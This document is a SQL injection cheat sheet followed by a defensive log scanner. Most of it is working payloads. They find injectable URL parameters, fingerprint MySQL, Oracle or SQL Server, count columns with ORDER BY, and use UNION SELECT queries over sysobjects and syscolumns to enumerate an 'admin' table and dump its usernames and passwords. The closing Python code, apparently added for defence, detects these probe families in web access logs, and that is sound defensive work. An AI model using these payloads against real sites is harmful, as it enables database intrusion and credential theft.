1 Determine whether the site has an injection point
① URLs that carry a query-string parameter (?name=value)
Integer:
www.target.com/1.php?id=88        normal
www.target.com/1.php?id=88-0      same as above
www.target.com/1.php?id=88-1      abnormal
String:
www.target.com/1.php?id=88' And 'a'='a   normal
www.target.com/1.php?id=88' And 'a'='b   abnormal
String (concatenation test):
www.target.com/1.php?id=88        normal
www.target.com/1.php?id=88'%2b'   same as above
www.target.com/1.php?id=88'%2b's  abnormal
2 Determine the database type
Database fingerprinting
MySQL
/*!%20s*/        error means MySQL
/*!40000%20s*/   error means version > 4.0 (above 4.0 UNION injection is supported)
/*!60000%20s*/   normal means version < 6.0
/*!50130%20s*/   error means version is 5.1.30
/*pc*/           // normal means MySQL
supports --pc but not ;   // Oracle
and exists(select @@version)--   // normal means SQL Server
Determine the number of columns
Find the column count of the query that displays database information
id=1/**/Order/**/By/**/5/**/--   normal means column count >= 5
id=1/**/Order/**/By/**/6/**/--   error means column count < 6
Determine the column data types
id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--
id=1/**/union/**/all/**/select/**/NULL,NULL,'test',NULL,NULL--
If the page renders normally, column 3 is a string column and can be used to display injected data.
Display the database version
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--
Current database name
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--
Table names in a specified database (DBNAME is a placeholder for the database name)
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from DBNAME..sysobjects where xtype='u' and name not in(select top 0 name from DBNAME..sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
Table names in the current database
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 1 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
Column names
Starting from 0, increase N in the second "top N" to iterate through the column names of the admin table.
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
Column values
id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--
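From the defender's side, every probe family in this cheat sheet leaves a recognizable trace in the web server's access log. The following Python is an added example, not part of the original cheat sheet: it normalizes a query string the way the SQL parser would see it (URL-decodes it, unwraps MySQL /*!NNNNN ... */ versioned comments, treats /**/ as whitespace), then matches the probe patterns listed above against constructed log lines. The log lines, signature names and regular expressions are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page); each query
# string is shaped like one of the probes listed above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /1.php?id=88 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /1.php?id=88%27%20And%20%27a%27=%27a HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /1.php?id=1/**/Order/**/By/**/5/**/-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /1.php?id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,@@version,NULL-- HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /1.php?id=1/*!40000%20s*/ HTTP/1.1" 500 0',
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
VERSIONED_COMMENT_RE = re.compile(r'/\*!\d*\s*(.*?)\*/', re.S)
PLAIN_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
# One signature per probe family from the cheat sheet; matched on normalized text.
SIGNATURES = {
    'union_select': re.compile(r'\bunion\s+(?:all\s+)?select\b'),
    'order_by_probe': re.compile(r'\border\s+by\s+\d+'),
    'version_read': re.compile(r'@@version'),
    'mssql_catalog': re.compile(r'\b(?:sysobjects|syscolumns|db_name\s*\()'),
    'tautology': re.compile(r"'(\w+)'\s*=\s*'\1"),
    'trailing_comment': re.compile(r'--\s*$'),
}

def normalize(query: str) -> str:
    """Decode and canonicalize a query string the way the SQL parser would see it."""
    text = unquote_plus(query)
    text = VERSIONED_COMMENT_RE.sub(r' \1 ', text)  # MySQL executes /*!NNNNN ... */ bodies
    text = PLAIN_COMMENT_RE.sub(' ', text)          # /**/ is used as a whitespace substitute
    return re.sub(r'\s+', ' ', text).strip().lower()

def classify(query: str) -> list[str]:
    """Return the names of every signature that matches one raw query string."""
    tags = ['mysql_versioned_comment'] if '/*!' in unquote_plus(query) else []
    norm = normalize(query)
    return tags + [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, tags) for each request whose query string trips a signature."""
    hits = []
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m or '?' not in m.group(1):
            continue
        tags = classify(m.group(1).split('?', 1)[1])
        if tags:
            hits.append((idx, tags))
    return hits
```

The integer probes (id=88-0, id=88-1) carry no keyword and are not covered by these signatures; they are better caught by comparing response sizes or status codes across consecutive requests to the same path.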